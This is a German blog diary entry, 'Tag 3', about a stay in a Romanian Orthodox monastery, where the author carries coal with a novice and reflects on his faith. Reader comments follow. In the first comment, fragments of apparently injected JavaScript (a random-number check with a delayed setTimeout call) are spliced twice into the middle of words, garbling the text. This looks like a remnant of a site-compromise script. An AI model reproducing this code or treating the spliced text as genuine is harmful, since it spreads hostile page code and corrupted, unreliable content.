Tag 3

Tag 3

In der Nacht von einem Albtraum aufgewacht, am Morgen mit einem schuldbeladenen Traum aufgewacht. Dauerregen. Kraftsport bringt Wärme und das Gefühl eines Körpers. Schwere, wie in den letzten Tagen. Nicht unangenehm, geht nicht in Richtung Depression. Da sein.

Am Mittag lässt der Regen nach und die Sonne kommt kurz raus. Das erste Mal seit meiner Ankunft kann ich weiter als 150 m schauen. Michael bittet um meine Hilfe. Er ist Novize, spricht von allen Menschen im Kloster am besten Englisch und wurde mir vom Abt als Ansprechpartner für alles zugeteilt. Er hat vor einigen Jahren in England gearbeitet, in einer Fabrik für Nachspeisen, „Dany + Sahne“ und sowas, nur eben nicht bei Danone. Gutes Geld, aber dann rief die Heimat in ihm und der Wunsch aus der Pubertät, Mönch zu werden, ist wieder erwacht. Nun ist er auf dem Weg. Wir haben Kohle aus großen Säcken in kleine Säcke umgefüllt und zu den großen Heizkesseln des Klosters gebuckelt. Die Anlage wird mit Holz und Kohle beheizt. Gemeinsame, körperliche Arbeit ist eine solide Grundlage für ein gutes Gespräch. Ich fremdele stark mit dem Gottesbild von Michael (und damit wohl mit dem Gottesbild der orthodoxen, rumänischen Kirche), doch es gibt ihm Halt und es macht sein Leben sehr sinnvoll. Und wer bin ich, dass ich bewerte? „Ein jeder nach seiner Fasson“ gilt ja nach wie vor.

3 Gedanken zu „Tag 3

  1. Dorothea

    Hallo lieber Götz, großartig von dir zu hören. Ich kann tatsächlich bislang deinen Gedanken gut folgen. Die Filme brauchen, bis sie geladen sind, aber sehr schön, Deine Stimme zu hören. Wir gehen morgen in unsere Schwitzhütten-Wochenende und ich werde an Dich denken. Kenia hat uns wieder einmal die so oft fehlende Demut wiedergebracht. Da ich Rumänien sehr gut kenne, kann ich mir gut vorstellen, wie es dir dort geht (Landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andschaft, Wetter und Menschen). Zum Schluss noch ein wenig Prosa aus dem Buch Geh-Danken von Heiko Kroy. ich denke, das passt gut zu deiner eigenen inneren Mission.
    Thema SUCHE
    Auf der Suche nach Sinn
    Es gibt ihn nicht, den Sinn
    den wir so oft suchen.
    Es liegt an uns, den Erfahrungen
    in unserem Leben
    durch Be-Sinnung einen Sinn zu gebe.

    Aber ist es dann auch der richtige Sinn,
    den wir unseren erfahrungen zuschreiben?

    Es gibt ihn nicht,
    den wahren oder den richtigen Sinn
    Es ist stets unsere Wahl,
    welchen Sinn wir den Dingen geben

    Aber unsere Haltung bestimmt, welchen Sinn wir wählen.

    Vielleicht hilft Dir diese Frage weiter
    Welche Haltung hasdt Du gegenüber Dir und dem Leben?

    …Wir denken ganz doll an Dich und grüßen Dich aus dem fernen Spandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andau

  2. Schwester S.

    Junge, kriegst du auch genug zu essen? 🙂
    Schwester S.

    • GoetzWache2018 Autor des Beitrags

      Es liegt wohl in der Familie, dass Du nach dem Essen fragst. Habe einen Beitrag dazu erstellt. Bussi

Die Kommentare sind geschlossen.